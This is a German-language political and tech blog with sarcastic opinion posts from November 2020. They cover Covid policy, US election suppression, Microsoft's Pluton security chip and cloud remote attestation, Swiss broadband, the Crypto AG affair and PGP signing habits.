Haben die Regierung und die Abgeordneten alles nach Strich und Faden verkackt? Natürlich haben sie das! Wie immer!
Wir alle haben es von Anfang an gewusst. Wir standen direkt daneben! Wer jetzt überrascht tut, ist ein Heuchler.
Was wäre die rationale Reaktion gewesen? Freiwillig selber seinen Teil tun, dass die Situation nicht entgleitet.
Klar, einige Dinge konnte man nicht (legal) besser machen. Dass sie die Schulen wieder aufgemacht haben, dafür sollten die zuständigen Entscheidungsträger einmal abgeurteilt werden. Totschlag? Fahrlässige Körperverletzung in ein paar Millionen Fällen? Was weiß ich schon, bin kein Jurist.
Die Leute reden immer vom kleinen Staat und dass sie wollen, dass der Staat sich raushält. Aber keiner will dann in Eigenverantwortung die Situation so verbessern, dass ein Eingreifen des Staates nicht mehr nötig ist.
Was mich am meisten aufregt? Beim Klimawandel läuft das ja genau so. Keiner macht was, und dann meckern alle auf der Regierung herum. Wisst ihr, wer die ganzen Emissionen ausstößt? WIR MENSCHEN. Wer in den Firmen arbeitet, die Umweltsäue sind? WIR MENSCHEN! Genau wie bei Covid jetzt stehen wir auch bei der Klimakatastrophe seit Jahrzehnten direkt daneben und tun -- nichts. Ach komm, schnell noch ein Auto kaufen. Gibt gerade Abwrackprämie!!1! Oh, was? Wir werden alle sterben? DIE BÖSE REGIERUNG!!1!
Bei der Klimakatastrophe wird auch irgendwann die Scheune so brennen, dass die Politik wieder zu kopflosen Hühnern wird. Ich bin mir jetzt schon sicher: Dann werde ich empörte Mails kriegen. Wie können die nur! Das ist ein Grundrechtseingriff!1!!

Wed Nov 18 2020

[l] Habt ihr auch solche Angst, dass euch Covid-19 umbringen wird?
Ihr solltet euch eher vor Lärmschutzwand-Betonplatten sorgen. Neulich wurde ja eine Frau in ihrem Auto auf der Autobahn von einer Lärmschutzplatte erschlagen. Seit dem hat sich in dem Fall ein bisschen was bewegt. Der Tagesspiegel berichtet dazu:
Die [] Betonplatte an der A3 [] wurde bei ihrer letzten planmäßigen Untersuchung 2013 mit „Sehr gut“ bewertet.
Oh ach so. 2013, ja? Sehr gut, wie? Ist das nicht ein bisschen lange her?
Tatsächlich hätte das Bauwerk 2019 erneut überprüft werden sollen.
Ach naja, ihr wisst ja wie das ist. Da haben sich so viele Dinge angestaut, die mal jemand gucken müsste, da hat man halt Yolo gesagt und die "verzichtbaren" Prüfungen nach hinten geschoben.
Warum war die verzichtbar, fragt ihr? Na, äh, die war ja gerade erst geprüft und für sehr gut befunden worden. Brandneu, außerdem! Habt ihr mal eine unserer alten Autobahnbrücken gesehen?! Da hättet ihr auch alles andere erstmal stehen und liegen gelassen, um die Brücken zu priorisieren. Leider ist da kein Geld für tatsächliche Ausbesserungen da, insofern bleiben die Brücken auch Priorität. Das heißt ja nicht, dass sich da jemand kümmert, nur weil das Priorität hat.
Aber ich schweife ab.
[] beim Einbau der Platte 2007 improvisiert worden sei, um einen Höhenunterschied auszugleichen.
Ich hör im Hintergrund ECKHAAAAAAAAART. Das sind ja Zustände...
Die Behörde sprach von einem „mit Absicht herbeigeführten Mangel“.
Wot? Das wird ja immer schlimmer!!
Na gut, dann haftet halt die Baufirma, nicht wahr? Gucken wir doch mal, wer das war.
Laut dem Bericht des Verkehrsministeriums an den Landtag hatte eine Firma aus Gelsenkirchen 2007 die Stützwand errichtet, eine andere fertigte die Betonplatte an.
Wenn ihr euch jetzt Sorgen macht, dass die sich gegenseitig die Schuld zuschieben, dann habe ich gute Nachrichten: Nein, tun sie nicht.
Beide Unternehmen seien inzwischen aber insolvent.
Ja, äh gut. Das verkompliziert die Dinge ein bisschen. Sie können jetzt nicht mal rausfinden, ob das eine der Pleitefirmen war oder ein Subunternehmer.
OK. Also. Ähm. Na dann gucken wir doch wenigstens mal, ob die anderen Platten, die diese Unternehmen angebracht haben, auch lebensgefährlich sind, nicht wahr?
[] einen bereits verbogenen Schweißanschluss mit erhöhter Rissgefahr entdeckt. Es sei nicht davon auszugehen, dass bei ähnlichen Bauwerken an anderen Autobahnstellen akute Gefahr bestehe
Ah. Phew. Für einen Moment habe ich mir da Sorgen gemacht.
Gut, dass wir das mal geklärt haben!
Hier *brösel* gibt es nichts *bröckel* zu sehen! Weitergehen!
[l] HAHAHAHA wie geil! Bill Gates hat sich aus dem Stand einen Ehrenplatz in der Trolling-Highscore-Liste erarbeitet:
Bill Gates über Maskenverweigerer: "Wir bitten Sie (auch), Hosen zu tragen!"
Oh wie ich gerade hoffe, dass auch George Soros das ansagt. Und dann müssen die Covidioten alle ohne Hosen rumlaufen! Gran-di-os! Hut ab, Herr Gates! *slowclap.gif*
Update: Geht schon los mit ohne Hose.
Update: Gauland hat das schon gemacht, bevor es cool war.
Update: Das Video von dem AfD-Typen ist von einem offensichtlichen Trollaccount, das habt ihr hoffentlich alle gemerkt. Hier gibt es ein anderes Video von dem Vorfall aber da steht nichts von Selbstentblößung. Ich bin mir ziemlich sicher, wenn der sich wirklich entblößt hätte, dass jemand davon ein Foto irgendwo hochgeladen hätte.
Update: Hier hat sich jemand vorsorglich auch obenrum frei gemacht.
Noch einer (oder bloß andere Perspektive auf denselben Typen?)
[l] Und wer hat Sie mit dem Covid angesteckt, gnä Frau?
Der Gesundheitsminister.
Oh, er hat sie angerufen und gewarnt?
Nein, das habe ich aus der Presse erfahren.
Ach komm, Fefe, sei mal nicht so hart mit dem Spahn. Dem kann man keinen Vorwurf machen. Der weiß doch nicht, was er tut. Außerdem hat er ja das Gesundheitsamt informiert und die haben dann nichts damit gemacht. Warum? Nun, ...
Grundsätzlich sei die Information von Kontaktpersonen "nicht erforderlich", wenn es dort keine Hinweise auf Ansteckungen gebe, teilt Bezirksstadtrat Oliver Schworck mit. "Der positiv Geteste wird dazu befragt, ob er sich an die entsprechenden Vorgaben gehalten hat", etwa an Abstandsregeln. Werde dies "glaubhaft bestätigt", müsse niemand kontaktiert werden.
Jawoll ja! Ist ja nicht so als hätten wir es hier mit einer gefährlichen Pandemie oder so zu tun.
Die wollen alle bloß spielen.

Tue Nov 17 2020

[l] Ich muss irgendwo schlechtes Karma angehäuft haben. Jedenfalls werde ich gerade umzingelt von PR-Bullshit über Cloud Computing. Aus allen Richtungen blasen sie feingeriebenen Kuhfladennebel in meine Richtung.
Pass uff, Fefe, wir machen jetzt Secure Boot in der Cloud! Was genau soll da am Ende die Aussage sein?
Ihr versteht schon, dass das per Design eine virtualisierte Umgebung ist, oder? Du glaubst, du redest mit der Hardware, aber tatsächlich redest du mit einem Stück Emulator-Software, die von jemandem betrieben wird, um deine Software zu verarschen. So zu verarschen, dass sie glaubt, sie liefe auf nicht-virtualisierter Hardware.
Wer die Umgebung betreibt, in der deine Software läuft, kann auch einfach so tun als gäbe es da Hardware-Security und dir genau die Hashwerte geben, die du gerne hören wolltest!
Nicht nur das: Einer der Gründe für die Cloud ist, dass man von Hardware-Ausfällen abstrahieren kann. Deine virtuelle Maschine wird einfach auf eine andere physische Hardware umgezogen! So und jetzt denken wir alle nochmal scharf nach, was das für Remote Attestation heißt, wenn sich nach dem Booten die Hardware ändern kann, auf der der Code läuft, aber niemand sagt dem Code Bescheid. Oh, was sagt ihr? Ist alles Bullshit! Bingo! 100 Punkte für die Kandidaten!
Und was war die Antwort der Sales-Kokser? Wir machen einfach Remote Attestation durch den Hypervisor hindurch!!1! Ja, äh, ... tolle Idee! Aber woher weißt du, dass du mit dem TPM redest und nicht mit einem Emulator? Woher weißt du, dass es überhaupt ein TPM in Hardware gibt?!
Ich kläre mal auf. Das erkennst du daran, dass deine Hardware eine Hintertür-Hardware drin hat, die Management Engine, und die kann dir mit einem nur Intel bekannten Private Key signierten Kram geben. Die Signatur kannst du checken, und dann weißt du: Es war Intel. Gut, außer jemand anderen hat den Key auch. Vielleicht die US-Regierung, die übrigens der dickste Kunde ist, den ein Cloud-Provider haben kann, und um den sich gerade AWS und Azure vor Gericht streiten, so wichtig ist der. Interessenskonflikt much?
Ich bin ja auch immer wieder fasziniert, dass die Leute annehmen, wenn sie bei Amazon einen Secure Key Store klicken, dass das dann ein HSM ist. Die Leute hören, was sie hören wollen. Amazon musste ihnen nichtmal ins Gesicht lügen! Sie mussten nur einfach die Details weglassen oder ins Kleingedruckte schieben. Das reichte.
Besser noch! Amazon konnte dann als Zusatzdienstleistung ein Cloud-HSM anbieten (ein HSM ist ein Hardware Security Modul, eine Art Safe mit einem Computer drin, der unextrahierbar den Private Key hat). Ja, richtig gelesen. Ein Cloud-HSM. Mit anderen Worten: Der andere Service ist gar kein HSM. Und glaubt ihr da hätte mal einer der Kunden Fragen gestellt? Nix da!
Dieses Cloud-HSM ist natürlich auch kein HSM. Wozu die Kosten auf sich nehmen. Deine Software läuft auf einer Hardware, die jemand anderes betreibt. Ob da ein HSM dran ist oder nicht ist völlig wurscht. Und das ist eh alles virtualisiert. Woran würde deine Software also erkennen, dass das HSM nur emuliert ist?
Wieso ich hier ewig lang herrumrante? Weil ich gerade über zwei Neusprech-Bomben gestolpert bin. Erstens: Azure Sphere. Zweitens: Der "Pluton"-Chip (*fremdschäm* DER RÖMISCHE GOTT HEISST PLUTO NICHT PLUTON IHR BARBAREN)
So, Trinkspiel. Setzt euch mal hin und lest die beiden Seiten und dann erklärt mir, was die da konkret anbieten. So wie ich das sehe bestehen beide Seiten praktisch vollständig aus nichtssagenden Worthülsen.
Ich zitiere mal zwei Paragraphen von diesem Pluton-Dingens:
Today, Microsoft alongside our biggest silicon partners are announcing a new vision for Windows security to help ensure our customers are protected today and in the future. In collaboration with leading silicon partners AMD, Intel, and Qualcomm Technologies, Inc., we are announcing the Microsoft Pluton security processor. This chip-to-cloud security technology, pioneered in Xbox and Azure Sphere, will bring even more security advancements to future Windows PCs and signals the beginning of a journey with ecosystem and OEM partners.
Our vision for the future of Windows PCs is security at the very core, built into the CPU, where hardware and software are tightly integrated in a unified approach designed to eliminate entire vectors of attack. This revolutionary security processor design will make it significantly more difficult for attackers to hide beneath the operating system, and improve our ability to guard against physical attacks, prevent the theft of credential and encryption keys, and provide the ability to recover from software bugs.
Ich hab mal deren peinlichen PR-Fettdruck-Formatierungsscheiß weggemacht. Der eigentlich wichtige Punkt ist im letzten Halbsatz. Das ist, worum es geht. Wir, Microsoft, sehen uns nach 30 Jahren der Investition völlig außerstande, auch nur perspektivisch daran zu denken, jemals Software ohne Sicherheitslöcher ausliefern zu können. Daher haben wir aufgegeben und zwängen euch jetzt einen Chip auf, den ihr nicht kennt, den niemand von euch haben wollte, und dem ihr ab jetzt vertrauen müsst. Glaubt uns am besten einfach, dass wir niemals nie nicht NSA-Backdoors ausliefern würden oder so. Wir sind hier die Guten!1!! Das dient alles der Sicherheit! (Genau wie die ganzen NSA-Programme übrigens)
Wie, ihr wollt ein Opt Out? Nee, gibt es nicht. Wir packen den Scheiß direkt in die CPU rein. Damit ihr möglichst keine Wahl habt, haben wir das direkt Intel, AMD und Qualcomm übergeholfen. HAHAHAHA DA BLEIBT NICHT VIEL ANDERES ÜBRIG HAHAHAHA IHR KÖNNT JA BEI APPLE KAUFEN HAHAHAHAHA
Im Hintergrund denkt euch einen Bill Gates, der eine fette Langhaarkatze streichelt.
Wobei. Ich bin da vielleicht ein bisschen vorschnell. Es ist nicht so, dass die Seiten gar nichts sagen. Eine Sache sagen sie: Vertraut uns. Wir arbeiten dran. Was ihr alles an grundsätzlichen fundamentalen unreparierbaren Gründen gegen die Cloud gehört habt, das betrifft nicht unsere Cloud, denn wir haben magischen Feenstaub drübergesprenkelt.
Eines Tages werden wir mehr wissen. Wenn ihr mich fragt: Bestimmt was mit Blockchain und Machine Learning.
Update: Hahaha jetzt kommen hier lauter Einsendungen zu dem Begriff "Pluton". Stellt sich raus: Es gab auch Pluton im Griechischen als Synonym für Hades, dessen Namen man nicht auszusprechen wagte, weil er ja für Tod stand. Wikipedia dazu:
Platon beispielsweise meint, Pluton/Plutos sei durchwegs positiv zu sehen als der Spender von Reichtum
Passt doch perfekt, findet der Einsender. Ein anderer Einsender fand noch eine andere Wortbedeutung, aus der Geologie, wo es für eine besonders tiefe Intrusion geht. Das meint zwar aber eine Intrusion im geologischen Sinne, aber der andere Einsender fand, das passe auch prima für einen "Security-Chip".
[l] Leserbrief zu Glasfaser in der Schweiz:
ich wohne in der Schweiz. Dummerweise halt nicht in einer der Städte, sondern etwas abseits. Und ich kann dir versichern, die Netzversorgung auf dem Land ist hier mindestens genauso scheisse wie in Dland.
Ich bekomme hier weder Breitbandkabel noch Glasfaser. Und das wird auch so bleiben. Meine aktuelle Internetverbindung ist 80 / 30 MBit (Ping 13 ms) und kostet ein bisschen mehr als 50 CHF.
An meinem alten Wohnort hatte ich Nachbarn, die über eine 1 MBit Richtfunkstrecke ins Internet gehen mussten. Das galt als "Highspeedverbindung".
Bis vor ein paar Jahren war der einzige Anbieter, mit dem ich zuhause ein Mobiltelefon nutzen konnte, die Swisscom. Die ist ein völlig überteuerter Drecksladen, vergleichbar mit der Telekom. Inzwischen kann ich zwar mit allen 3 Mobilfunkanbietern telefonieren, aber 4G kannst du komplett vergessen, 5G wird es hier nie geben (jedenfalls nicht zu meinen Lebzeiten). Ist mehr so wie in Brandenburg.
Und noch ein Wort zu den Providern: die bauen hier mitnichten die Netze aus. Also tun sie schon, aber nur wenn die jeweilige Gemeinde eine "Kooperation" mit einem der Provider eingeht. Das sieht dann im Allgemeinen so aus, dass der Provider sich von der Gemeinde den Netzausbau ganz oder teilweise bezahlen lässt. Oder die Gemeinde macht es gleich selber und die Provider steigen dann ins gemachte Bettchen.
Den Vergleich zwischen Swisscom und Telekom kann ich mir nur so erklären, dass der gute Einsender noch nie persönlich mit der Telekom zu tun hatte.

Fri Nov 13 2020

[l] Hier ist noch einer für Freunde des überspezifischen Dementis.
Es gab da doch diese Prepper-Verschwörung im Militär, um einen Typen, der sich Hannibal nannte. Ihr erinnert euch. Die hatten eine Abteilung namens "Nordkreuz", die vom Verfassungsschutz als rechtsextrem eingeschätzt wurde.
Jedenfalls stand jetzt plötzlich der Verdacht im Raum, der Innenminister von Mecklenburg-Vorpommern, ein gewisser Herr Caffier, habe sich bei den Nordkreuz-Faschos eine Schusswaffe gekauft. Was macht man in solchen Fällen? Man fragt den Betroffen auf einer Pressekonferenz. Das lief wie folgt ab:
Der CDU-Politiker und Jäger wich auf einer Presskonferenz der Frage aus, ob er eine Waffe bei einer Person mit möglicher Nähe zur Gruppe „Nordkreuz“ gekauft habe. Er betonte, das falle in seinen „Privatbereich“, dazu könne man ihn gerne privat anfragen. Allerdings bleibe privat auch in Zukunft privat.
Das ist ja schonmal großartig. Lange nicht mehr fühlte ich so spontan so eine Vertrauensbasis entstehen wie hier!
Ich hab mich ja jahrelang über die Amis lustig gemacht, die einen bei der Einreise per Ankreuzformular fragten, ob man vorhabe, den US-Präsidenten zu ermorden. Womöglich habe ich da zu früh gelacht und es ging gar nicht darum, wer da "ja" ankreuzt, sondern wer zu lange braucht, um "nein" anzukreuzen, oder gar im Halbdelirium herumfaselnd der Frage auszuweichen versucht.
Das war noch nicht das überspezifische Dementi. Das kommt jetzt:
Der „Ostsee-Zeitung“ sagte der 65-jährige Caffier, er habe weder eine dienstliche Waffe erhalten, noch habe er eine dienstliche Schießausbildung erhalten. Der Rest gehe die Öffentlichkeit nichts an.
LOOOOOOL
Hey, warte mal, welche Partei hat diesen Gefährder da hingeschickt? Oh ja, natürlich. Die CDU. Wer sonst.
[l] Kennt ihr den schon? Auf dem Wahlzettel tauchen Fake-Kandidaten mit gleichem Namen wie Democrats-Kandidaten auf? Die haben keinerlei Wahlwerbung gemacht, haben keine Wahlversprechen veröffentlicht, sind nirgendwo aufgetreten. Ein Schelm, wer da an Wahlbetrug denkt!
Das war in Florida. An wen ging Florida noch gleich? Oh ja richtig.
That third party candidate is Alexis Rodriguez, who has the same last name as the Democratic incumbent senator Jose Javier Rodriguez. The Republican challenger is Ileana Garcia.
Alexis Rodriguez falsified his address on his campaign filing form last June. The couple who now live at the Palmetto Bay address say they have been repeatedly harassed since then by people looking for Rodriguez, who hadn’t lived there in five years.
Bestimmt alles bloß ein bedauerliches Missverständnis. Clerical Error!
Oh nee warte. Softwarefehler! Kann man nichts machen.

Thu Nov 12 2020

[l] Seid ihr auch so froh, dass wir trotz Covid die Schulen aufgemacht haben?
Was war noch gleich die Grenze, ab wann ein Gebiet als Risikogebiet gilt? 50? 100?
Ach komm, Fefe, Friedrichshain, das interessiert doch keinen. Diese Linksgrünversifften da. Na gucken wir doch mal bei einem CDU-regierten Bezirk. Ihr wisst schon. Da wo die Vernunft regiert!
Hups.
[l] Ich habe gerade das neue Buch von Greg Palast gelesen, das kann man auf seiner Homepage gegen eine Spende als PDF runterladen. Es heißt "How Trump Stole 2020", oder man kriegt es im Buchhandel für 16 Euro.
Und wisst ihr was? Ich verstehe jetzt, wieso Donald Trump von dem Wahlausgang so überrascht war. Es ist ein veritables Wunder, eine göttliche Intervention, dass nach all dem Wahlbetrug der GOP immer noch am Ende eine Mehrheit für Biden rauskam. Das ist geradezu bemerkenswert unwahrscheinlich, wenn man sich von Palast vorrechnen lässt, wie viele Millionen an wahrscheinlichen Democrats-Wählern von den Republikanern in den Bundesstaaten aus den Wahlregistern gestrichen wurden. Palasts vorsichtige Schätzung kommt insgesamt auf über 7 Millionen. Nicht vergessen: Das sind gezielte Eingriffe in Democrat-Hochburgen in befürchteten Swing States!
Und das rechnet noch gar nicht die Effekte vom Gerrymandering ein, die man übrigens selbst auf Wikipedia sehen kann, indem man das Stimmverhältnis im Popular Vote mit der Sitzverteilung im Unterhaus vergleicht.
Die meisten Democrat-Stimmen unterdrückt hat übrigens ein Democrat. In Kalifornien. Ein Mann namens Alex Padilla. Um Bernie Sanders zu verhindern. Falls ihr euch gewundert hattet, wieso die Democrats diese Taktiken nicht verhindern.
Oh und eine Sache sollte man nicht unter den Tisch fallen lassen. Diese Wahlbetrugstaktiken richten sich, das ist immer wieder berichtet worden, gegen Schwarze. Sie richten sich genau so, stellt sich raus, gegen Asiaten und Latinos. Und gegen Studenten jeder Hautfarbe. Unter Studenten gibt es bekanntlich nicht viele Konservative.
Hier sind ein paar Tricks, um Studenten als Wähler stillzulegen.
Wisconsin verlangte Photo ID. Der Staat gibt den Studenten einen Studentenausweis mit Photo. Den ließ man aber im Wahllokal nicht zu. Ein Waffenschein oder ein Führerschein hingegen reicht als Photo ID. Studenten, die in den USA auf dem Uni-Campus wohnen, brauchen aber keinen Führerschein und viele, besonders die ärmeren Minderheiten, haben keinen. Die Uni von Wisconsin hat 182.000 Studenten. Trump gewann 2016 mit einem Vorsprung von ca 22000 Stimmen. Die Regelung wurde 2 Wochen vor den Wahlen von einem Partisanen-Richter installiert. Nun hätte die staatliche Uni ja auch wahl-zugelassene Photo ID verteilen können, daher hat der Wahlbetrüger Gouverneur Walker schnell eine Uniführung ernannt, die das nicht tun wollte.
Viele Studenten haben dann Briefwahl gemacht, weil sie dachten, so kämen sie um diese Schikanen drumherum. Ergebnis: Deren Stimmen wurden weggeschmissen, wenn nicht angeheftet eine Kopie des Ausweises war, und eine Immatrikulationsbescheinung. Natürlich hat man den betroffenen Studenten nicht gesagt, dass ihre Stimmen nicht gezählt wurden. Ergebnis: Die Wahlbeteiligung von Studenten ging in Wisconsin von 67% auf 49% zurück. Also … Beteiligung ist jetzt das falsche Wort eigentlich, denn beteiligt haben die sich ja schon.
Von 28000 Stimmen konnte nachgewiesen werden, dass sie wegen ID requirement weggeschmissen wurden, dazu kommen die ganzen Studenten, die sich von den Schikanen abschrecken ließen und es gar nicht erst probiert haben.
In Florida hat man den Klassiker gefahren, und einfach keine Wahllokale auf dem Campus gehabt. Sonst ist man da wenig zurückhaltend. Es gibt Wahllokale in Country Clubs, in Schützenvereinen, Kirchen, … überall nur nicht an den Unis. Ein paar Aktivisten haben geklagt und erwirkt, dass Wahllokale in Unis erlaubt sind — aber ob sie da auch aufgestellt werden unterliegt der Diskretion der Wahlbezirksleiter, im Allgemeinen Republicans. Das Ergebnis könnt ihr euch ausmalen.
Was mir auch noch nicht so klar war ist wie lange der Kampf um den Wahlbetrug schon zurück geht. George Washington hat hart dafür kämpfen müssen, dass der vor-revolutionäre Eid an Jesus gestrichen wurde, damit auch Juden wählen konnten. Einige Bundesstaaten verlangten auch einen Eid, dass man mit keiner ausländischen Macht verbündet sei. Das hat Katholiken von den Wahlen ausgeschlossen. In Rhode Island konnten Juden bis 1842 nicht wählen. In North Carolina konnten Katholiken bis 1868 nicht wählen (zu dem Zeitpunkt hatten Schwarze dort schon ihr Wahlrecht). Die Ureinwohner-Indianer haben erst 1924 die US-Staatsbürgerschaft erhalten. Ihr Wahlrecht erhielten sie sogar erst 1962. Tja, und dass ihre Stimmen auch tatsächlich garantiert gezählt werden, das muss erst noch erstritten werden.
Die Zivilisationsdecke ist dünn.

Wed Nov 11 2020

[l] Zum Schweizer Geheimdienstsumpf um die Crypto AG gibt es gerade ein paar Neuigkeiten.
Die wichtigste Neuigkeit ist, dass die eine Schwesterfirma namens Infoguard AG hatten, die anscheinend das gleiche Modell fuhr und ihren Kunde im Auftrag der CIA kompromittierte Backdoor-Krypto verkaufte.
Ansonsten hat die Republik einen Verantwortlichen beim Namen recherchiert: Ein Herr Regli, Geheimdienstchef.
Stellt sich raus: Parlamentarische Geheimdienstkontrolle funktioniert in der Schweiz genau so gut wie überall sonst. Gar nicht.
Die haben jetzt auf Druck von der Presse mal eine "Aufarbeitung" gemacht, bei der ein PDF-Report rauskam (mein persönliches Highlight: oben rechts auf der Titelseite steht: "[QR Code]". m(
Wenn ihr die erste Seite von dem Report lest, klingt das eher als seien sie noch stolz auf sich. Eher ungewöhnlich für einen Bericht über die Aufarbeitung einer Affäre.
Übrigens: Der Bundesrat ist in der Schweiz die Regierung, nicht wie bei uns eine Kammer des Parlaments. Wenn die also lügen, der Bundesrat habe nichts gewusst, ist das wie wenn bei uns die Regierung lügt, sie habe nichts gewusst.
Hach, Europa. Die Ähnlichkeiten überwiegen halt am Ende doch alle Unterschied zwischen den Völkern. (Danke, Andreas)
[l] Oh Mann. Jetzt kommen hier so Numerologen-Mails rein. Die Biden-Wahl wurde gephotoshoppt! I can see it in the pixels! Das Wahlsystem ist unsicher!!1!
Bitte hört auf, mir diesen Scheiß zu schicken.
Trump hatte jetzt vier Jahre, ein sicheres Wahlsystem zu installieren. Die ersten zwei Jahre hatte er alle Mehrheiten dafür. Hat er nicht gemacht.
Warum nicht?
Na weil das potentiell auch den Wahlbetrug seiner Seite verhindert hätte. Denn das ist eines der zentralen Demokratiedefizite des US-Wahlsystems: Das Electoral College. Das sorgt dafür, dass Stimmen unterschiedlich viel wert sind, je nach Wohnort.
Großstädte wählen im Vergleich zur Landbevölkerung progressiv. Das ist ja auch bei uns so. Die CSU kriegt in München keinen Fuß auf den Boden. Dazu kommt, dass es eine Landflucht gibt (Leute ziehen in die Städte), was den Effekt verstärkt, und dass neue Zuwanderer häufiger in Städte als aufs Land ziehen. Man könnte vermuten, dass das den Trend umkehren würde, aber so funktionieren Menschen nicht. Menschen möchten gerne von Freunden umgeben sein und passen sich im Konfliktfall lieber an. Nicht alle natürlich, aber der Durchschnittsmensch.
Wenn eine Zuwanderergruppe in einer Stadt eine substanzielle Minderheit oder gar die Mehrheit bildet, kann das anders aussehen (z.B. die Exilkubaner in Miami), aber das ist nicht die Regel.
Wenn ihr mal sehen wollt, wie krass das Electoral College sich vom Popular Vote unterscheidet, hat Wikipedia eine Übersicht. Und das ist mal echt krass, wenn ihr mal bei Richard Nixon und Ronald Reagan guckt. Die hatten im Electoral College über 90%! Ergebnisse wie in der DDR!1!!
Kurz gesagt: Ist das Wahlsystem der USA undemokratisch und unsicher? Ja, natürlich!
Heißt das jetzt, dass Trump sich beklagen kann? Nein. Denn er hätte es reparieren können, hat es aber nicht getan, weil er selber auch weiterhin schön bescheißen können wollte. Wenn es jemand verdient hätte, durch Wahlbetrug abgesetzt zu werden, dann jemand, der vorher die Chance hatte, das System zu reparieren, und es nicht getan hat.
Aus meiner Sicht ist das ganze System in den USA ein einziger Wahlbetrug. Aber das ist deren Land, deren Demokratie. Wenn die da keinen Handlungsbedarf sehen, dann ist das deren Entscheidung. Nicht unsere. Wer JETZT davon überrascht ist, dass das System kacke ist, der hat seine demokratischen Pflichten seit Jahren verkackt und hat es nicht besser verdient.
Update: Aber Fefe, woher weißt du denn, dass das Absicht war, dass Donald Trump das Wahlsystem nicht repariert hat? Nun, ich präsentiere: Exhibit A: Ein Trump-Tweet aus dem Jahre 2012.
The electoral college is a disaster for a democracy.

Tue Nov 10 2020

[l] Irgendwie ist mein Stresslevel gewaltig gesunken, seit AP den Wahlsieg von Biden ausgerufen hat. Ich kann mich gar nicht erinnern, wann ich das letzte Mal so tiefenentspannt war.
Und so richtig rational erklärbar ist das ja nicht, denn von Biden wissen wir ja, dass er für alles steht, was in der Politik schlecht und verderbt ist. Biden ist der Grund, wieso wir Trump gekriegt haben.
Da nehmen sich Biden und Trump auch nicht viel. Beide haben horrende Politik gemacht, stehen für menschliche, finanzielle und sonstige Abgründe. Wo Trump Kinder von ihren Eltern getrennt hat, hat Biden die gesetzlichen Grundlagen dafür geschaffen. Wo Obama und Biden einen illegalen Angriffskrieg gestartet haben, hat Trump weitergebombt und noch ein paar Marines hinterhergeschickt.
Wieso hat Trump also so einen Stress ausgelöst?
Das liegt glaube ich daran, dass wir uns an Biden gewöhnt haben. Ja, der macht auch nur schlechte Dinge, und zwar nicht aus Inkompetenz sondern aus Überzeugung. Aber den glauben wir einschätzen zu können. Der überrascht uns nicht mit immer noch schlimmeren Ausfällen. Der ist von Anfang an gleichmäßig furchtbar.
Trump hingegen hat immer noch eskalierend nachgelegt und seine Menschenverachtung offener zu Schau getragen.
Stellt sich raus: Das ist kein Zufall, dass die Establishment-Politik so aussieht, wie sie aussieht. Das ist das Ergebnis einer Evolution. Das ist die perfekte Politik, um wiedergewählt zu werden. Man lügt den Leuten dreieinhalb Jahre ins Gesicht, und dann macht man ein halbes Jahr Wahlkampf voller hohler Versprechungen, die nie jemand einzulösen plant.
Und am Wahlergebnis gerade kann man ja gut sehen: Die Leute wollen das so!
Es ist auch ungerecht da nur auf Biden und Trump herumzutreten. Wenn ich mir AOC angucke, sehe ich auch nur Fassade und keine Substanz. Ein einziges Empörungs-Crescendo. Und das liegt interessanterweise nicht daran, dass es da keine Substanz gäbe. Guckt euch mal an, was die alles für Gesetze eingebracht hat. Und natürlich wird sie komplett ausgebremst von den anderen "Democrats", in irgendwelche Unterkommittees verschoben, wo die Vorschläge dann langsam vor sich hin gammeln. Und ich rede hier nicht davon, dass der republikanisch dominierte Senat das abschießt. Nein. Das Unterhaus, in dem die Democrats die Mehrheit haben. Alles, was die eingebracht hat, wurde von ihren eigenen Leuten plattgemacht.
Und was bleibt? Theater. Die tun alle so, als würden sie regieren. Wir tun alle so, als würden wir sie beauftragen. Und dann regen wir uns gemeinsam darüber auf, dass das Wahlsystem so kacke ist, aber verhindern alle Verbesserungen.
Theater!
Aber es stellt sich halt raus: In Krisenzeiten (und auch sonst) ist Theater gut fürs Gemüt. Beruhigt die Bevölkerung. Vielleicht sollten wir mehr echte Theater fördern, um bei den Leuten das Bedürfnis zu stillen. Damit wir in der Politik wieder Politik machen können statt Theater. Nur so ne Idee.
[l] Eines muss man dem Elon Musk ja lassen. Der erkennt eine Geschäftsgelegenheit, wenn er sie sieht.
Der versucht doch gerade in Brandenburg eine Tesla-Fabrik zu bauen. Bei der Gelegenheit hat er mal sein Handy eingeschaltet und die Internet-Situation in Brandenburg wahrgenommen.
SpaceX gründet eine deutsche Starlink-Tochter, Satelliteninternet für bedürftige Dritte-Welt-Regionen! Wie? Nein, nicht Ghana. Pfft. In Ghana haben sie ordentliches Internet. Brandenburg!
(BTW: Golem scheint ihre freiwillige Selbstabschaltung rückgängig gemacht zu haben.)

Mon Nov 9 2020

[l] Liebe Leute, passt mal bitte kurz auf.
Wenn ihr mir per PGP eine verschlüsselte Nachricht schreibt, dann MÜSST IHR DIE AUCH SIGNIEREN. Ansonsten kann ich die zwar lesen aber euch nicht verschlüsselt antworten.
Wenn ihr die Nachricht signiert, dann hängt da eure KeyID dran. Mit der kann sich mein GnuPG dann den public key vom Keyserver ziehen. Und dann kann ich auch verschlüsselt antworten.
Schaltet also bitte euren Default auf "Verschlüsseln UND signieren".
Aber Fefe, du kannst doch auch nach dem Namen oder der E-Mail suchen auf dem Keyserver! Ja schon, aber jeder kann Schlüssel unter beliebigen Namen hochladen. Wenn ihr mir eine signierte Nachricht schickt, dann kriege ich genau euren Public Key vom Server, egal wie viele Fake-Keys da noch daneben liegen.
Ich weiß nicht, welcher Volldepp "nur Verschlüsseln" zum Default gemacht hat, aber das ist an der Stelle nicht zielführend.
Ich will nicht verschweigen, dass es einen Grund gibt, etwas zu verschlüsseln aber nicht zu signieren. Der Grund ist, wenn ihr ein Dissident seid und mir etwas verraten wollt, aber wenn später die Gestapo euren Laptop beschlagnahmt und den Private Key findet, dann wäre eine Signatur unter der Mail an mich auch gleichzeitig der Beweis, dass die Mail von euch kam. Ihr hättet euch sozusagen selber inkriminiert.
Wenn ihr also etwas so Brisantes leaken wollt, dass ihr einen Zugriff der Gestapo befürchten müsst, wenn das rauskommt, dann signiert nicht.
Am besten schickt ihr das dann aber auch nicht an mich, denn da hab ich auch keinen Bock drauf, dass irgendwelche Geheimdienste mich auf ihrer Liste hochpriorisieren. :-)
Für eure normalen Mails an mich gilt jedenfalls: Verschlüsseln UND signieren. Und den public key auf einen der Keyserver hochgeladen haben.
[l] Mir schreiben gerade lauter Trump-Fans, dass CNN und alle anderen Mainstream-Medien ihre Livestreams vom Wahlabend gelöscht hätten.
Für die Trumpisten ist völlig klar: Da sollen Beweise für Wahlbetrug vernichtet werden.
